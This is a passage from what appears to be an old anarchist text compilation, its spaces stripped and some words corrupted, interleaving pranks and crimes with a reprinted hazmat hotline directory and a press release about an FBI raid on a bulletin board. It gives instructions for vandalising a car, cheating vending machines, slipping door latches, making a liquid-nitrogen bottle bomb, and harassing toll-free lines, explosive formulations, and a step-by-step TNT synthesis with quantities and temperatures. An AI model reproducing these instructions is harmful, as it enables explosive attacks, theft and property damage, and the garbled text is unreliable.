(610)Cansofgenericshavingcream. (1)Freeafternoon(preferablyinFREEZINGtemperaturesoutside) (1ormore)Pairsofpliers,forcuttingandpeeling. Somephriends.

Directions: Findsomeonewhoownsasmallcompactcar,andmanagetofindoutwherehekeeps itatnight(orwhileheisaway!)Beabletoopenthecarrepeatedly..Placea canintheliquidnitrogenforabout30sec.Takeitoutandcarefullyand QUICKLYpeeloffthemetaloutsidecontainer,andyoushouldhaveafrozen "block"ofshavingcream.(Ithelpstohavemorethanonecontainer,andmore phriends)Tossitintothecaranddothesamewithallthecans.Adozenor more"blocks"likethiscanfillandlightlyPRESSURIZEasmallcar.Whenhe opensthedoor(hopefullyhedoesn'trealizethemessinsideduetothefoggy windows),hewillbecoveredwithpoundsofshavingcreamthatisabitchtoget outofupholstery. PS!Trytogetoneishisglovecompartment!!!!! 177.Anothergoodwaytoripoffachangeordrinkmachinebydlsh Youfirstgetanicenewdollartoworkwith.Makesuretherearenoripsinit. Now,yougetathinpieceoftransparentplasticabout3/4thewidthofthe actualdollar.Itmustbeagood6"orlonger.Next,youneedsometransparent tape.Scotchmagictapewillworkthebest.Yousimplytapetheplasticstripto thedollar.But,youmustbecarefulnottotapeitmorethan"upthesideof thedollar.Tapeitonbothsides(frontandback,nottopandbottom)ofthe dollar.Now,allyouhavetodoisuseit: Walkcasuallyuptothesecludedmachine.Takeoutyourdollar,andputitinto themachine.BECAREFUL!Someofthemoremodernchangemachineshavealarms! Mostlikely,though,drinkorcandymachineswillnot.Now,themachinestarts takingyourdollar....Youwaituntilyourplasticstripisalmostalltheway intothemachine,andthenyoupullwithsufficientforcetogetthedollarout ofthemachine,butnotripit.Ifyoudiditcorrectly,youshouldhavegotten whateveryoubought,andstillhaveyourdollarforlateruse.Oncandy machines,though,makeyourselection,andthenwaitandpullthedollarout. Don'tworryifyoudon'tgetitonthefirstfewtries.Ittookmeabout5tries tomasterit.ItDOES,IrepeatDOESworkforafactifdonecorrectly.Ifyou justcan'tgetit,though,eitherthemachineistoosophisticated,oryouput thetapeuptoohighonthedollar.Havefun!!!! 178.LockpickingfortheEXTREMEbeginner...bydlsh Thisisreallyagoodmethodforopeningdoorsthatarelocked.Theonlyproblem withthis,though,isthatitonlyworksforoutwardopeningdoors.OK,herewe go.... 1. Realizeyouarenotworkingwiththeactuallock,butthatthingthat sticksbetweenthedoorandthewall. 2. Seehowthatthingiscurvedononeside?Well,thatiswhatwewillbe makinguseof. 3. Acquirealargepaperclip.Ifitistooshort,itwon'twork.Youhaveto alsohaveashoelace.Now,ontotheconstruction...

4.

Straightenthepaperclip.

5. Looponeendofthepapercliparoundtheshoelace.Theshoelaceshouldbe about4/5ononesideoftheclipand1/5ontheother.Let'sseeifIcandraw it. ************************************* * ******* isthepaperclip ***istheshoelace That'snotverygood,butIhopeyougetthepicture. 6. Allyouhavetodonowiscurvethepaperclip(no,Iwon'tdrawit)

7. Withthecurvedpaperclip,stickitbetweenthedoorandthewall,behind themetalthingthatsticksbetween. 8. Feeditthroughwithyouhand,untilyoucangripbothsidesofthe shoelace. 9. Now,simplypullthelaceandthedooratthesametime,andVIOLA!the doorisopen. Ipreferthisoverregularlockpickingifthedooropensoutward,becauseitis alotquicker.Lockpickingcantake5minutes...Whendonecorrectlythisonly takes30seconds!So,ifyoucan,usethis.

179.ANARCHY'N'EXPLOSIVESPRELUDEVOLUMEbyExodus Foryoupeoplethatlikeblowingthingsupandshitlikethat,here'ssomething that'snotasdangerousorasdifficultasmoreoftheexplosivesavailable(or abletocreate)...It'scalledtheLNBomb(ShortforLiquidNitrogenBomb). Veryeasytomake: Ingredients: 1PlasticTwoLiterBottle EnoughLiquidNitrogenToFillTheBottle Instructions: Fillthebottlewithliquidnitrogen.Thencapastightlyaspossible.The vaporizationofthenitrogenwillcreateenoughpressureinthebottle(within 515minutes)tobreakitwithaquitestrongexplosiveforce...VeryEasy... USEATYOUROWNRISK.... 800#'stophuckwithCompiledbyTheDuelist CALLJYERINC.xxxxxxxxxx Numberswitha?eithercallforwardtotakeyouonsometripthroughswitches, butI'msureifyoufuckaroundwithitenoughyouwillgettheretone somewhere. Havefun.......Later!

800 4261244? 6456561VMS 2471753? 5244040? 6348026? 6677827? 8723425?(Extensiondialer) 9928911?Modem 6242367VMS(#) 4262468? 3389549VMS 2220400? 5376001? 3439255VMS(#) 8326979? 2339558VMS 7299000? 5335545? 3332222? 3335555VMS 3338888?

===========TOLLFREENUMBERSANDONLINEDATABASES========== Therearemanytollfreeassistancenumbersandonlinedatabasesavailableto federal,state,local,andprivatesectorpersonnel.Somemaybeavailable throughafederalorstateagency,whileothersarepubliclyavailableon commercialsystemsorthroughprivateorganizations.Exceptfortheirown, neitherDOTnorFEMAendorsesthefollowingtollfreetelephonenumbersoron linedatabases. 1. 2. 3. 4. FederalandStateTollFreeTechnicalAssistanceSources PrivateSectorTollFreeTechnicalAssistance FederalandStateAgencyOnlineDatabases CommercialandPrivateOnlineDatabases

FEDERALANDSTATETOLLFREETECHNICALASSISTANCESOURCES USCoastGuardNationalResponseCenter:18004248802 inWashington,DC(202)4262675 (202)2672675 EPAREGIONALHOTLINES EPAhasnowestablishedaHotlineineachofit'sregionalofficestohandle TitleIIIreporting.Pleasemakenoteofthenumberfortheofficeinyourarea. Nationwide(800)5350202 InAlaskaandDC(202)4792449 IntheRegionalOffices: RegionIBoston,MA(617)5653273 RegionIIEdison,NJ(201)3216765 RegionIIIPhiladelphia,PA(215)5971260 RegionIVAtlanta,GA(404)3473222 RegionVChicago,IL(312)8866418 RegionVIDallas,TX(214)6557244

RegionVIIKansasCity,KS(913)2362806 RegionVIIIDenver,CO(303)2931730 RegionIXSanFrancisco,CA(415)9747054 RegionXSeattle,WA(206)4421270 RemembertoreportallhazardousmaterialsreleasestoyourLocalEmergency PlanningCommitteerepresentativeandtoyourStateEmergencyResponse Commissionimmediately! TOXICRELEASEINVENTORYREPORTINGCENTER EPAhasestablishedareadingroomintheToxicInventoryReportingCenter(TRC) locatedat470L'EnfantPlazaEast,SW,Suite7103,Washington,DC20024.The readingroomprovidesaplaceforconcernedcitizenstoreviewreleasedataas suppliedtotheEnvironmentalProtectionAgency(throughsection313reporting). Todate,thecenterhasreceivedmorethan50,000ofthe300,000releasereports anticipated. TheTRC'sisintendedtoserveasacentralreceiptpoint,aidinthesorting recordingandstorageofreleasedatareportedunderTitleIII.Additionallythe TRCistoprovideaneasymethodtofacilitatepublicinquiries.Anyonecan accessthechemicalinformationbyloggingontoadatabaseandcallingthe informationupbyusingCASnumber,state,cityand/orfacilityname. StafffromComputerBasedSystems,Inc.(EPAcontractor)areonhandtoassist withsysteminquiriesbetween8:00amand4:00PM,MondaythroughFriday.To scheduleanappointment,pleasecall(202)4881501.

CHEMICALEMERGENCYPREPAREDNESSPROGRAM(CEPP)1(800)5350202 (202)4792449 Contact:ChemicalEmergencyPreparednessProgram(CEPP) OfficeofSolidWasteandEmergencyPreparedness USEnvironmentalProtectionAgency(WH548A) 401MStreet,SW Washington,DC20460 EMERGENCYMANAGEMENTINFORMATIONCENTER(EMIC)18006381821 (301)4476771ext6032 Contact:EMICLibrarian,LearningResourceCenter NationalEmergencyTrainingCenter 16825SouthSetonAvenue Emmitsburg,Maryland21727 FEMAestablishedEMIC(EmergencyManagementInformationCenter)toassist faculty,staff,studentsandoffcampususersoftheNationalEmergency TrainingCenterLearningResourceCenterwiththeirresearchandinformation needs.EMICisaspecialcollectionofnaturalandtechnologicalcasestudy documentsthatcanberequestedforloantostatelevelfireandemergency managementofficialsbyapplyinginwriting,onofficialletterhead,totheEMIC librarian.Otherrequestswillbereferredbacktoappropriatestatesfor handling.

SUPERFUNDANDRESOURCECONSERVATIONANDRECOVERYACT18004249346 (202)3823000

Contact:ForSuperfundOfficeofEmergencyandRemedialResponse USEnvironmentalProtectionAgency 401MStreet,SW Washington,DC20460 ForCERCLAOfficeofWasteProgramsEnforcement USEnvironmentalProtectionAgency 401MStreet,SW Washington,DC20460 EPAestablishedthetollfreetechnicalassistancehotlinein1980toanswer questionsandprovidedocumentstothoseneedinginformationontheSuperfund andResourceConservationandRecoveryAct.

TOXICSUBSTANCESCONTROLACT(TSCA)(202)5541404 Contact:ToxicSubstancesControlActAssistanceOffice OfficeofToxicSubstances USEnvironmentalProtectionAgency PRIVATESECTORTOLLFREETECHNICALASSISTANCESUPPORT CHEMTREC:1(800)4249300.Alaska,HawaiiandDC(202)4837616 Contact:ChemicalManufacturersAssociation 2501MStreet,NW Washington,DC20037. TheChemicalManufacturersAssociationsetuptheChemicalTransportation EmergencyCenter(CHEMTREC)toprovideimmediateassistancetothoseatthe sceneofaccident,24hoursaday,sevendaysaweek.CHEMTRECmaintainsan onlinedatabaseonthechemical,physical,andtoxicologicalpropertiesand healtheffectsofthethousandsofproductsofthemembercompanies.CHEMTREC operatesintwostages:first,staffprovidechemicalinformationforusein onsitedecisionmakinginvolvinghandlingtheearlystagesoftheproblemand, second,notifiesthemanufactureroftheproductoftheaccidentformore detailedinformationandappropriatefollowup. CHEMNETisactivatedbyacalltoCHEMTREC.Ifamembershippercannotrespond promptlytoanincidentandachemicalexpertisrequiredatasite,thenthe shippercanauthorizeaCHEMNETcontractedemergencyresponsecompanytogoin itsplace. CHLOREP:EmergencycontactthroughCHEMTRECabove. Contact:ChlorineInstitute 342MadisonAvenue NewYork,NY10017. TheChlorineInstitutein1972establisheditsChlorineEmergencyPlan (CHLOREP),amutualaidresponsenetworkofchlorinemanufacturersand packagers,toprovideassistanceatchlorineemergenciesintheUnitedStates andCanadathroughtelephoneinstructionstoonscenepersonnelorthe dispatchingoftrainedteamstosites.Responseisactivatedbyacallto CHEMTRECwhichinturncallsthedesignatedCHLOREPcontact,whonotifiesthe appropriateteamleaderbaseduponCHLOREP'sgeographicalsectorteam assignments. CAER:CommunityAwarenessandEmergencyResponseinformationline.Thisisa2 minuterecordedmessageinformingcallersofupcomingeventsrelatedto

coordinatedemergencyresponseplanning.TheCAERinformationnumberis(202) 4631599andisupdatedtwiceamonth. Tosubmitaneventtobepublicized,sendthematerialsto: ToddMiller CMACommunicationsDept. 2501MStreet,NW Washington,DC20037

TheCenterforFireResearchintheNationalBureauofStandardshasestablished apublicaccesscomputerbulletinboard. Contact:DougWalton SystemOperator U(301)9756872 Informationonthebulletinboardincludes: AlistingofthemostrecentreportsfromtheCenterforFireResearch; InformationonupcomingactivitiesattheCenterforFireResearchsuchas conferences,seminarsandworkshops;and InformationonFIREDOC,theCenter'sfireresearchbibliographic system. FEDERALANDSTATEAGENCYONLINEDATABASES TheOfficeofSolidWasteandEmergencyResponse(OSWER)bulletinboardis intendedtostorecommunicationsandtechnologytransferamongtheRegionsand withHeadquartersstaffinvolvedinsolidorhazardouswasteregulation, permitting,orenforcementandwithORDscientistsandengineersinHeadquarters andlaboratorieswhoaresupportingOSWER.TheOWSERisoperatedundercontract totheOfficeofProgramManagementTechnology(OPMT).TheOSWERBBSoffers messages,bulletins,filesandcomputerprograms,databases,andconferences. BulletinsincludeOSWERtechnicaltrainingopportunitiesandORDtechnology transferseminarsnationwide,newORDtechnicalpublications,thetop25 compoundsfoundatSuperfundSites,andthecurrentstatusoftheSITE technologydemonstrations.Conferencesinclude:Executive(forEPAmanagers only),GroundWaterWorkstation,GroundWaterMonitoringandRemediation,Risk Management/Assessment,andExpertSystems/GeographicInformationSystems.The BBSisprimarilyintendedforEPARegional,Headquarters,andORDpersonnel, however,OSWERwelcomesstateandlocalgovernmentagenciesandauthorizedEPA contractors.TheBBStelephonenumberis(301)5898366,thevoicelineis(301) 5898368. TheHazardousMaterialsInformationSystems(HMIS)offerstwomenudriven programstoassiststate,localandFederalagencies.TheUSDepartmentof Transportation(DOT),ResearchandSpecialProgramsAdministration's(RSPA) projectoffersquickaccesstobothexemptionsinformationandinformal interpretations.Theexemptionsmenuprovidesaccesstothefollowing:exemption numbers,exemptionholders,expirationdates,containertypeandDOT specification,hazardousmaterial,shippingnameandclass,andregulations affected.Theinterpretationsmenuprovidesaccesstoinformalinterpretations issuedbytheStandardsDivision,OfficeofHazardousMaterialsTransportation. Eachsearchprovides:requester,subject,commodity,containerandregulations affected.ThisserviceisprovidedFREEtostate,local,andfederalagencies. PrivatesectororganizationscannotgetanaccountontheHMISbutcancallto receiveprintoutsoninformationtheyneed(thereisafeefortheprintout).In ordertogainaccesstotheHMISyoumustFIRSTESTABLISHANACCOUNTby contacting:

LessieGraves OfficeofHazardousMaterialsTransportation InformationServicesUnit FTS/COMM:(202)3664555 OccupationalSafetyandHealthAdministration's(OSHA)ComputerizedInformation System(OCIS)isdesignedtoaidOSHA,StateOSHAProgram,andOSHAAreaOffice staffinrespondingtoemployers'andemployees'occupationalsafetyandhealth problemsbymaintainingquickaccesstovariouscomputerizedinformationfiles. OCISfilesaremaintainedonaDigitalVax11/750computerattheSaltLakeCity Laboratory;BASISisthedatabasemanagementsoftware;systemisaccessedfrom OSHAandStateProgramofficesonly;filesaremenudriven;andnewcapabilities areunderdevelopment. Questionsandcommentscanbedirectedto: OCISHelpDesk (801)5245366or5245896 FTS5885366or5885896 TheNationalLibraryofMedicine's(NLM)ToxicologyDataNetwork(TOXNET)isa computerizedsystemoftoxicologicallyorienteddatabanks,offeringa sophisticatedsearchandretrievalpackagewhichpermitsefficientaccessto informationonknownchemicalsandidentifiesunknownchemicalsbasedontheir characteristics.TOXNETfilesinclude:HazardousSubstancesDataBank(HSDB), ToxicologyDataBank(TDB),andChemicalCarcinogenesisResearchInformation ,System(CCRIS). RegisteredNLMuserscanaccessTOXNETbydirectdialorthroughTELENETor TYMNETtelecommunicationsnetworks.Thenationsaveragesearchcharges(per hour)are$75.00forprimetime. FordetailedinformationonTOXNETcontact: NationalLibraryofMedicine SpecializedInformationServices BiomedicalFilesImplementationBranch 8600RockvillePike Bethesda,MD20894 (301)4966531or4961131 COMMERCIALANDPRIVATEONLINEDATABASES FIREDOC:NationsavailableFromNBS TheCenterforFireResearchintheNationalBureauofStandardshasmadeits computerizedbibliographicsystem,FIREDOC,availableforsearchingonline.The systemcanbeaccessedbytelephoneusingacomputerasaterminal.About7,000 itemsfromtheCenter'scollectionarecurrentlyenteredintheFIREDOCsystem. ForfurtherinformationincludinginstructionsonaccessanduseofFIREDOC, contact: NoraJason TechnicalInformationSpecialist CenterforFireResearch (301)9756862 CFRBBSisapublicaccesscomputerbulletinboardsponsoredby:theCenterfor FireResearch,NationalBureauofStandards,USDepartmentofCommerce,in Gaithersburg,MD20899.ItfeaturescomputerprogramsdevelopedbytheCenterof FireResearch.Contentsoftheboardinclude:firesimulationprograms, informationonFIREDOC(theCenterforFireResearchbibliographicsearch system;FIREDOCusersguide;andFIREDOCcompatiblecommunicationspackage), informationonupcomingactivitiesattheCenterforFireResearch,anda listingofthemostrecentyear'sreportsfromthecenter.Thereisnoconnect

feeforusingtheboard;howevertheuserpaysforthephonecall.Formore informationcontactDougWalton,SystemOperator,at(301)9756872. PublicHealthFoundation'sPublicHealthNetwork(PHN)usershavefullaccessto allGTEMedicalInformationNetwork(MINET)services,andcancommunicate directlywithusersinPHNandotherdivisionsofMINET.AccesstoSurgeon General,NLM/NIH,CDC,andAmericanMedicalAssociationinformationservices (e.g.,DiseaseInformation,DrugInformation,MedicalProcedureCoding, SocioeconomicBibliography,ExpertMedicalPhysicianInformationRetrievaland EducationService,MassachusettsGeneralHospital(MGH)ContinuingMedical Education,andAPMedicalNewsService)areavailableranginginpricefrom$21 to$39anhourofconnecttime. Subscriptionfee,payableonaonetimebasisis$500.00,eachadditionaluser isregisteredat$25.00,andaUser'sGuidecosts$15.00.Connecttimerates rangefrom$14anhourpeakto$7anhouroffpeak,charactertransmission chargesare$.05per1,000characters. FordetailedinformationonPHNorMINETcontact: ThePublicHealthFoundation 1220LStreet,NW Suite350 Washington,DC20005 (202)8985600 InformationConsultants,Inc.'sChemicalInformationSystem(ICIS)andChemical InformationSystem,Inc.'s(FeinMarquartAssociates)System(CIS)aretwo competingcompanieswhichofferapproximately35databaseseach,somesimilar, othersdifferent.Databasesavailableforsearchinginclude,forexample:Oil andHazardousMaterialsTechnicalAssistanceDataSystem(OHMTADS)withemphasis onenvironmentalandsafetydataforspillsresponse;ChemicalEvaluationSearch andRetrieval(CEASARS)givesverydetailed,evaluatedprofileswithphysical andchemical,toxicologicalandenvironmentalinformation;NIOSHRegistryof ToxicEffectsofChemicalSubstances(RTECS)withacutetoxdata,TLV's, standards,aquatictox,regulatoryinformation,andNTPteststatus;Chemical CarcinogensisResearchInformationSystem(CCRIS)givingresultsof carcinogenicity,mutagenicity,tumorpromotionandcarcinogenicitytestsunder NationalCancerInstitutecontract;GENETOXwithgeneticassaystudies;AQUIRE withaquatictoxicityinformation;DERMALwithdermaltoxicityinformation. Subscriber($300peryearand$2585perhourofconnecttime)andnonsubscriber ($50115perhourconnecttime)optionsexist. Fordetailedinformationcontact: CIS,Inc.orInformationConsultants,Inc. FeinMarquartAssociates113315thSt.,NW 7215YorkRoadWashington,DC20005 Baltimore,MD21212(202)8225200 (800)2478737 180.ANARCHY'N'EXPLOSIVESVOLUME1byExodus Youmayask"NowwhywouldIwanttoknowsomeobsolete,unused,utterly useless,tollfreenumbers"Well,whatyouusethisinformationforisupto you,andifyouwanttouseitforsomethinglike...well,like,forcingthat linetobebusyfor2straightdaysthuscausingthecompanytolosemoney,is completelyuptoyou. Magazines ===== PlaygirlAdvisor(800)8542878(exceptCA)

TVGuide(800)5237933(exceptPA) Ladie'sHomeJournal(800)3278351(exceptFA) SportsIllustrated(800)6218200(exceptIL) BookDigestMagazine(800)2289700(exceptNebraska) Money(800)6218200(exceptIL) MailOrder ===== (bowlingequip.)(800)3231812(exceptIL) EddtheFlorist,Inc.(800)2471075(exceptIA) GolfMailOrderCo.(800)3271760(exceptFA) Inflateabed(800)8352246(exceptKS) InternationalMale(800)8542795(exceptCA) PortaYoga(c.c.orders)(800)3278912(exceptFA) UniqueProductsCo.(800)2282049(exceptNebraska) SkiResorts ====== HNConcord(800)4312217(onlyNewEnglandStates) Mt.Snow(800)4514211(EasorrnSeabord) SkiUsatFranconia(800)2580366(EasternSeabord) Stevensville(800)4312211(NewEnglandStates) Mannequins ===== DannDee(800)6213904(exceptIL) CarRentals ====== AAaron,Inc.(800)3277513(exceptFA) AirlinesRentA/Car(800)2289650(FAonly) DollarADay(800)4216868(exceptFA) Hertz(800)2611311(Canadaonly) SearsRentACar(800)2282800(exceptNebraska) ThriftyRentACar(800)3314200(exceptOklahoma) Newspapers ===== GlobeGazette(800)3926622(IAonly) OilDaily(800)2236635(exceptNY) ChristianScienceMotor(800)2257090(exceptMS) WallStreetJournal(800)2570300(exceptNJ) TheNationalObserver(800)3255990(exceptMO) FBIraidsmajorOhiocomputerbulletinboard;actionfollowsjointinvestigation withSPA. TheFederationBureauofInvestigationonSaturday,Jan.30,1993,raided"Rusty &Edie's,"acomputerbulletinboardlocatedinBoardman,Ohio,whichhas allegedlybeenillegallydistributingcopyrightedsoftwareprograms.Seizedin theraidontheRusty&Edie'sbulletinboardwerecomputers,harddiskdrives andtelecommunicationsequipment,aswellasfinancialandsubscriberrecords. Forthepastseveralmonths,theSoftwarePublishersAssociation("SPA")has beenworkingwiththeFBIininvestigatingtheRusty&Edie'sbulletinboard, andaspartofthatinvestigationhasdownloadednumerouscopyrightedbusiness andentertainmentprogramsfromtheboard. TheSPAinvestigationwasinitiatedfollowingthereceiptofcomplaintsfroma numberofSPAmembersthattheirsoftwarewasbeingillegallydistributedonthe Rusty&Edie'sBBS.TheRusty&Edie'sbulletinboardwasoneofthelargest privatebulletinboardsinthecountry.Ithad124nodesavailabletocallers andover14,000subscribersthroughouttheUnitedStatesandseveralforeign countries.Todate,theboardhasloggedinexcessof3.4millionphonecalls, withnewcallscominginattherateofover4,000perday.Itwasestablished in1987andhadexpandedtoincludeover19gigabytesofstoragehousingover 100,000filesavailabletosubscribersfordownloading.Ithadpaidsubscribers throughouttheUnitedStatesandseveralforeigncountries,includingCanada,

Luxembourg,France,Germany,Finland,theNetherlands,Spain,Swedenandthe UnitedKingdom. Acomputerbulletinboardallowspersonalcomputeruserstoaccessahost computerbyamodemequippedtelephonetoexchangeinformation,including messages,files,andcomputerprograms.Thesystemsoperatorisgenerally responsiblefortheoperationofthebulletinboardanddetermineswhois allowedtoaccessthebulletinboardandunderwhatconditions.Forafeeof $89.00peryear,subscriberstotheRusty&Edie'sbulletinboardweregiven accesstotheboard'scontentsincludingmanypopularcopyrightedbusinessand entertainmentpackages.Subscriberscould"download"orreceivethesefilesfor useontheirowncomputerswithouthavingtopaythecopyrightedowneranything forthem. "TheSPAapplaudstheFBI'sactiontoday,"saidIleneRosenthal,generalcounsel fortheSPA."ThisshowsthattheFBIrecognizestheharmthattheftof intellectualpropertycausestooneoftheUSsmostvibrantindustries.It clearlydemonstratesatrendthatthegovernmentunderstandstheseriousnessof softwarepiracy."TheSPAisactivelyworkingwiththeFBIintheinvestigation ofcomputerbulletinboards,andsimilarraidsonotherboardsareexpected shortly.Whetherit'scopiedfromaprogrampurchasedataneighborhoodcomputer storeordownloadedfromabulletinboardthousandsofmilesaway,pirated softwareaddstothecostofcomputing.AccordingtotheSPA,in1991,the softwareindustrylost$1.2billionintheUSalone.Lossesinternationallyare severalbilliondollarsmore. "Manypeoplemaynotrealizethatsoftwarepiratescausepricestobehigher,in part,tomakeupforpublisherlossesfrompiracy,"saysKenWasch,executive directoroftheSPA.Inaddition,theyruinthereputationofthehundredsof legitimatebulletinboardsthatserveanimportantfunctionforcomputerusers." TheSoftwarePublishersAssociationistheprincipaltradeassociationofthe personalcomputersoftwareindustry.It'sover1,000membersrepresentthe leadingpublishersinthebusiness,consumerandeducationsoftwaremarkets.The SPAhasofficesinWashingtonDC,andParis,France. CONTACT:SoftwarePublishersAssociation,Washington IleneRosenthal..202/4521600Ext.318 TerriChilds.....202/4521600Ext.320 181.ANARCHY'N'EXPLOSIVESVOLUME2byExodus Thisvolumedefinesafewvarietiesofmisc.explosives,charges,andwhateverI hadinmindatthattime.Anyway,theseformulasarenotasprecisein measurementsfortheyweregiveninbriefsummary.However,theywillwork,and ifusedcorrectlycanbesafeand"fun". FRENCHAMMONAL[LowExplosive]: Ingredients: 86%AmmoniumNitrate 6%StearicAcid 8%AluminumPowder

Description: Frenchammonalisaneasilyimprovisedlowexplosivemixture.Itisgenerally lesseffectivethananequalweightofTNT.Thematerialisloadedbypressing itintoasuitablecontainer.InitiationbyanEngineer'sspecialblastingcap isrecommended.

Comments: Thismaterialwastested.Itiseffective. References: TM312011,UnconventionalWarfareDevicesandTechniques,para1401. TETRYTOL[HighExplosive]: Ingredients: 75%Tetrytol 25%TNT

Description: Tetrytolisahighexplosiveburstingcharge.Itisusedasademolition explosive,aburstingchargeformines,andinartilleryshells.Theexplosive forceoftetrytolisapproximatelythesameasthatofTNT.Itmaybeinitiated byablastingcap.Tetrytolisusuallyloadedbycasting. Comments: Thismaterialwastested.Itiseffective. References: TM91900;Ammunition,General,page55.MilitaryExplosives,page188. IMPROVISEDPLASTICEXPLOSIVEFILLER[HighExplosive]: Ingredients: FinelyPowderedPotassiumChlorate Cdatabstals PetroleumJelly **MIXTHOUROUGHLY**

Description: ThisplasticexplosivefillercanbedetonatedwithaNo.8commercialblasting caporwithanymilitaryblastingcap.Theexplosivemustbestoredina waterproofcontaineruntilreadytouse. Comments: Thismaterialwastested.Itiseffective. References: TM31210,ImprovisedMunitions,secI,No.1. FLAMMABILITYOFGASES[GasExplosive]: Ingredients: ExplosiveGas

Description:

Undersomeconditions,commongasesactasfuel.Whenmixedwithair,theywill burnrapidlyorevenexplode.Forsomefuelairmixtures,therangeoverwhich theexplosioncanoccurisquitewidewhileforothersthelimitsarenarrow. Theupperandloweramountsofcommonfuelsthatwillcauseanignitablemixture areshowninthetablebelow.Thequantityshownisthepercentagebyvolumeof air.Ifthefuelairmixtureistooleanortoorich,itwillnotignite.The amountsshownarethereforecalledlimitsofinflammability. Gases(%byvolumeofair) Fuel(Gas) LowerLimit UpperLimit WaterGasOrBlueGas 7.0 72 NaturalGas 4.7 15 Hydrogen 4.0 75 Acetylene 2 81 Propane 2.2 10 Butane 1.9 9 Comments: Thesefuelshavebeentestedunderlaboratoryconditions.Theyareeffective. Ignitiondependsonmethodofinitiation,uniformityofmixture,andphysical conditions. References: Bulletin29,LimitsofInflammabilityofGasesandVaporsH.F.CowardandG.W. Jones,BureauofMines,USGovernmentPrintingOffice,1939. 182.ANARCHY'N'EXPLOSIVESVOLUME3byExodus ThisistheMOSTimportantoroneofthemostimportantvolumesregardingthe variousmixturesofanarchythatIwillbe"publishing"tothe"public".Also, itmayaswellbetheMOSTDANGEROUStoprepare,thesubstancewewillbe dealingwithisTrinitrotoluene,orshortTNT.ThishighexplosiveisaVERY DANGEROUS,slightlyunstablesubstance.ThecrystallizedcrudeTNTisaboutthe colorofbrownsugarandfeelsgreasytothetouch.Itissuitableformanyuses asahighexplosive,butnotfortheuseinhighexplosiveshells.Itisalso highlyreactivetomanyotherchemicalsubstances.Itcanbeincorporatedinto dynamiteandmanyotherexplosivesthatwillbeexplainedinfurtherdetail later,inothervolumesofANARCHY. WARNING: DONOTATTEMPTTOFINISHTHISPROJECTUNLESSYOUAREFULLYCAPABLESAFELY EXECUTINGTHEPROCESSESINASAFEENVIRONMENT!IFYOUCHOOSETOCONTINUE,READ THEINSTRUCTIONSCOMPLETELYTHROUGHBEFOREBEGINNINGANDHAVEALLMATERIALSAND TOOLS(INCLUDINGSAFETY/EMERGENCYEQUIPMENT)READYFORUSEWHENORIFTHEYARE NEEDED.THISISNOTAJOKE!USEATYOUROWNRISK!!!!! PreparationofTrinitrotoluene(ThreeStages).Amixtureof294gramsof concentratedsulfuricacid(density1.84)and147gramsofnitricacid(density 1.42)isaddedslowlyfromadroppingfunnelto100gramsoftolueneinatall 600cc.beaker,whiletheliquidisstirredvigorouslywithanelectricstirrer andit'stemperatureismaintainedat30Cto40Cbyrunningcoldwaterinthe vesselinwhichthebeakerisstanding.Theadditionofacidwillrequirefrom anhourtoanhourandahalf.Thestirringisthencontinuedforhalfanhour longerwithoutcooling;themixtureisallowedtostandovernightina separatoryfunnel;thelowerlayerofspentacidisdrawnoff;andthecrude mononitrotolueneisweighed.Onehalfofit,correspondingto50gramsof toluene,istakenforthedinitration.Themononitrotoluene(MNT)isdissolved in109gramsofconcentratedsulfuricacid(d.1.84)whilethemixtureiscooled inrunningwater.Thesolutioninatallbeakeriswarmedto50andamixed

acid,composedof54gramseachofnitricacid(d.10)andsulfuricacid(d. 1.84),isaddedslowlydropbydropfromadroppingfunnelwhilethemixtureis stirredmechanically.Theheatgeneratedbythereactionraisesthetemperature, andtherateofadditionoftheacidisregulatedsothatthetemperatureofthe mixtureliesalwaysbetween90and100.Theadditionoftheacidwillrequire about1hour.Aftertheacidhasbeenadded,themixtureisstirredfor2hours longerat90100tocompletethenitration.Twolayersseparateonstanding. Theupperlayerconsistslargelyofdinitrotoluene(DNT),butprobablycontains acertainamountofTNT.Thetrinitrationinthelaboratoryisconveniently carriedoutwithoutseparatingtheDNTfromthespentacid. Whilethedinitrationmixtureisstirredactivelyatatemperatureofabout90, 145gramsoffumingsulfuricacid(petroleumcontaining15%freeSO3)isadded slowlybypouringfromabeaker.Amixedacid,composedof72gramseachof nitricacid(d.10)andthe15%petroleum,isnowaddeddropbydropwithgood agitationwhiletheheatofthereactionmaintainsthetemperatureat100115. Afteraboutthreequartersoftheacidhasbeenadded,itwillbefound necessarytoapplyexternalheattomaintainthetemperature.Afteralltheacid hasbeenadded(taking1to2hours),theheatingandstirringarecontinued for2hourslongerat100115.Afterthematerialhasstoodovernight,the upperTNTlayerwillbefoundtohavesolidifiedtoahardcake,andthelower layerofspentacidtobefilledwithcdatabstals.Theacidisfiltered throughaBuchnerfunnel(withoutfilterpaper),andthecakeisbrokenupand washedwithwateronthesamefiltertoremoveexcessofacid.Thespentacid containsconsiderableamountsofTNTinsolution;thisisprecipitatedby pouringtheacidintoalargevolumeofwater,filteredoff,rinsedwithwater, andaddedtothemainbatch.Alltheoftheproductiswashedthreeorfour timesbyagitatingitvigorouslywithhotwaterunderwhichitismelted.After thelastwashing,theTNTisgranulatedbyallowingittocoolslowlyunderhot waterwhilethestirringiscontinued.Theproduct,filteredoffanddriedat ordinaryroomtemperature,isequaltoagoodcommercialsampleofcrudeTNT.It maybepurifiedbydissolvinginwarmalcoholat60andallowingtocool slowly,oritmaybepurifiedbydigestingwith5timesitsweightof5%sodium hydrogensulfitesolutionat90forhalfanhourwithvigorousstirring, washingwithhotwateruntilthewashingsarecolorless,andfinallygranulating asbefore.Theproductofthislasttreatmentisequaltoagoodcommercial sampleofpurifiedTNT.PureALPHATNT,meltingpoint80.8,maybeprocuredby recrystallizingthismaterialoncefromnitricacid(d.1.42)andoncefrom alcohol. Well,that'sit...ANDREMEMBERMYWARNING! 183.ANARCHY'N'EXPLOSIVESVOLUME4byExodus Inthisparticularvolume,wewillbediscussingtypesofDynamite,thesehigh explosivesbeingoneofthemoreimportantordestructiveoftheanarchist's formulas.Notethatsomeofthesemixturesareveryunstableorshockignited, andthatcareshouldbeobservedwhenhandlingtheseunstablemixtures.Someof theseformulaedealwithTrinitrotoluene(TNT)andthepreparationforthatis givenunderthevolume3,withinthisseries. WARNING: THESEAREREALEXPLOSIVESANDMAYCAUSESERIOUSINJURYORDEATHUPONMISUSE.DO NOTATTEMPTTOPREPAREANYASSAMPLEIFYOUARENOTFULLYCAPABLEOF UNDERSTANDINGTHEDANGERSANDPRECAUTIONSOFTHESEPRODUCTS.THESEFORMULAEARE THETRUEFORMULAETOCREATETHESEMIXTURESANDARETHEREFOREVERYDANGEROUS.USE 